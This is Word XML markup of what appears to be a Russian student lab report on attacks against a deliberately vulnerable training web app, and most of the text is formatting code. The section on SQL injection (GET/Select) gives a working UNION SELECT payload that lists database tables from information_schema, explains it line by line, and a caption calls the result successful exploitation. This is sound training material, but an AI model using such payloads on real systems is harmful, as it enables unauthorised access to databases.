      <w:r w:rsidRPr="00D73D41">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C542820" w14:textId="2724228A" w:rsidR="00D73D41" w:rsidRDefault="00D73D41" w:rsidP="00345222">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Получаем сообщение об успешном входе (рис. 3.1.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304DC7F9" w14:textId="77777777" w:rsidR="002F695F" w:rsidRDefault="002F695F" w:rsidP="00345222">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E0215D" w14:textId="6A4BA404" w:rsidR="00D73D41" w:rsidRDefault="00D73D41" w:rsidP="00D73D41">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D73D41">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E321A3D" wp14:editId="50853A41">
            <wp:extent cx="5940425" cy="28975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46F8" w14:textId="25A04813" w:rsidR="00D73D41" w:rsidRDefault="00D73D41" w:rsidP="00D73D41">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 3.1.4. Успешная эксплуатация уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F9BF78" w14:textId="58332BC5" w:rsidR="00D73D41" w:rsidRDefault="00D73D41" w:rsidP="00D73D41">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A92F0B" w14:textId="77777777" w:rsidR="00BF7602" w:rsidRPr="0043619A" w:rsidRDefault="00D73D41" w:rsidP="00BF7602">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc182315632"/>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00BF7602" w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection (GET/Select)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="3CD8DD96" w14:textId="618C52B3" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Необходимо</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>открыть</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Injection (GET/Select)</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Откроется станица с заданием. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь расположены выпадающий список и таблица под ним </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(рис. 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B99F21" w14:textId="77777777" w:rsidR="0043619A" w:rsidRPr="0061100C" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1A9472" w14:textId="6354020B" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28DF448D" wp14:editId="386FEE2D">
            <wp:extent cx="5940425" cy="19113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C2FC" w14:textId="3057A20A" w:rsidR="0043619A" w:rsidRPr="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00975DE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE3B33" w14:textId="5E35DC47" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535086B4" w14:textId="6173E528" w:rsidR="0043619A" w:rsidRPr="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Выбрав фильм из выпадающего списка, можно увидеть, параметры запроса передаются в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">адресе, что говорит о том, что форма использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>запрос (рис. 3.2.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FB858" w14:textId="4E876D85" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C817024" wp14:editId="3AB3FA27">
            <wp:extent cx="5940425" cy="2848610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C976" w14:textId="16D15D3C" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 3.</w:t>
      </w:r>
      <w:r w:rsidR="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Выбор фильма.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66505DE6" w14:textId="77777777" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152B5344" w14:textId="728B4032" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Теперь можно составить инъекцию, которая будет выводить информацию о таблицах базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632AA03E" w14:textId="3AA6DBD1" w:rsidR="0043619A" w:rsidRPr="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0043619A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348558C" w14:textId="77777777" w:rsidR="00086F2A" w:rsidRPr="00086F2A" w:rsidRDefault="00086F2A" w:rsidP="00086F2A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Объяснение запроса:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906DA44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t>movie=1 — это исходная часть запроса, которая передает параметр в приложение. В случае SQL-инъекции злоумышленник может изменить его, чтобы добавить свой вредоносный SQL-код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F026A9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t>UNION ALL SELECT — используется для объединения результатов из исходного запроса с результатами, полученными из дополнительного SELECT-запроса, который извлекает информацию о таблицах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560817EE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t>table_schema, table_name — из схемы information_schema выбираются столбцы table_schema (схема базы данных) и table_name (имя таблицы). Эти столбцы содержат информацию о всех таблицах в базе данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8AECF1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lastRenderedPageBreak/>
        <w:t>null, null, null, null, null, null — здесь добавляются дополнительные NULL значения, чтобы привести количество столбцов в запросе к тому же числу, что и в исходном запросе, который выполняется в приложении. Это необходимо для того, чтобы запрос не вызвал ошибку из-за несоответствия количества столбцов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB0871B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t>LIMIT 1 OFFSET 1 — ограничивает выборку одним результатом и пропускает первую строку, что позволяет обойти возврат первой таблицы. Это полезно, если нужно получить конкретную таблицу или строку из списка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C016F" w14:textId="77777777" w:rsidR="00086F2A" w:rsidRPr="00086F2A" w:rsidRDefault="00086F2A" w:rsidP="00086F2A">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-- — это комментарий, который игнорирует оставшуюся часть исходного запроса, предотвращая ошибки и обеспечивая успешное выполнение инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FC502" w14:textId="77777777" w:rsidR="00086F2A" w:rsidRPr="00086F2A" w:rsidRDefault="00086F2A" w:rsidP="00086F2A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Результат:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05B4B8" w14:textId="36784F79" w:rsidR="00086F2A" w:rsidRPr="00086F2A" w:rsidRDefault="00086F2A" w:rsidP="00086F2A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Этот запрос позволяет получить имена таблиц из базы данных, возвращая только одну строку с данными о таблице, пропуская первую строку</w:t>
      </w:r>
      <w:r w:rsidRPr="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>рис. 3.2.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD18235" w14:textId="77777777" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027D1907" w14:textId="4FE5D88E" w:rsidR="0043619A" w:rsidRDefault="00086F2A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086F2A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FB1A916" wp14:editId="1A7D3FCF">
            <wp:extent cx="5940425" cy="28740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D911" w14:textId="5B2916F5" w:rsidR="0043619A" w:rsidRDefault="0043619A" w:rsidP="0043619A">
      <w:pPr>
        <w:pStyle w:val="Image"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок 3.</w:t>
      </w:r>
      <w:r w:rsidR="00FD1E8A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. Успешная эксплуатация уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2301DA" w14:textId="0D7EA6EB" w:rsidR="00D73D41" w:rsidRPr="00D73D41" w:rsidRDefault="00D73D41" w:rsidP="00D73D41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D73D41" w:rsidRPr="00D73D41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BB6F9" w14:textId="77777777" w:rsidR="00176466" w:rsidRDefault="00176466" w:rsidP="0042218F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="394E2A88" w14:textId="77777777" w:rsidR="00176466" w:rsidRDefault="00176466" w:rsidP="004221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1FE0FE" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="4A0732A9" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218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0AEDD" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218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23EBA" w14:textId="77777777" w:rsidR="00176466" w:rsidRDefault="00176466" w:rsidP="0042218F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14A5B860" w14:textId="77777777" w:rsidR="00176466" w:rsidRDefault="00176466" w:rsidP="004221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2591"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CEC86C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3C5C4B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA38F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5079AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3402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980A80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29748B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660B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32A8A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840B24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45566354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4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4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4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4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4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4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4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4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4"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="322C0D08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32CACA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84F5E7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49524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C50A51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6BC3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2C72BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A04053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6305E86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFCC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9B7113"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ECA0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DD1584"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BB01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E24898"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EEC1E1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E2E7C03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95FC6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AA43FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67828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BC707F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0BE46F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20F5A3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BC2A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623824"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07024FE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E040536"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1ADA5C46"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="709" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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right"/>
      <w:pPr>
        <w:ind w:left="2869" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3589" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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right"/>
      <w:pPr>
        <w:ind w:left="5029" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5749" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6469" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E6459EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CB2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421C1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD9E0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B304FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF3C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C37315"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CBEE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70877DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FC23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666B36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71A4F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706E77"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18B2C978"/>
    <w:lvl w:ilvl="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27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="74220BF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE02C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890347"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B038D00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63F309B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCAC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8010E72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2BE83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8D72B17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76F63058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  <w:color w:val="000000"/>
        <w:sz w:val="20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  <w:color w:val="000000"/>
        <w:sz w:val="20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  <w:color w:val="000000"/>
        <w:sz w:val="20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  <w:color w:val="000000"/>
        <w:sz w:val="20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  <w:color w:val="000000"/>
        <w:sz w:val="20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  <w:color w:val="000000"/>
        <w:sz w:val="20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  <w:color w:val="000000"/>
        <w:sz w:val="20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  <w:color w:val="000000"/>
        <w:sz w:val="20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  <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7E8B6664"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5BC6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3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="23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297"/>
    <w:rsid w:val="00036090"/>
    <w:rsid w:val="00086F2A"/>
    <w:rsid w:val="000D5501"/>
    <w:rsid w:val="00176466"/>
    <w:rsid w:val="00187C9A"/>
    <w:rsid w:val="00194A63"/>
    <w:rsid w:val="002F695F"/>
    <w:rsid w:val="00322AE7"/>
    <w:rsid w:val="00345222"/>
    <w:rsid w:val="0042218F"/>
    <w:rsid w:val="0043619A"/>
    <w:rsid w:val="004E0B23"/>
    <w:rsid w:val="00541FA4"/>
    <w:rsid w:val="0058614A"/>
    <w:rsid w:val="005E07AD"/>
    <w:rsid w:val="0061100C"/>
    <w:rsid w:val="006B2540"/>
    <w:rsid w:val="00773CF6"/>
    <w:rsid w:val="0079128B"/>
    <w:rsid w:val="00890787"/>
    <w:rsid w:val="008F496D"/>
    <w:rsid w:val="009126BC"/>
    <w:rsid w:val="00975DE2"/>
    <w:rsid w:val="009F2397"/>
    <w:rsid w:val="00A5065A"/>
    <w:rsid w:val="00A70756"/>
    <w:rsid w:val="00A90600"/>
    <w:rsid w:val="00AB6179"/>
    <w:rsid w:val="00B45A63"/>
    <w:rsid w:val="00BD08D8"/>
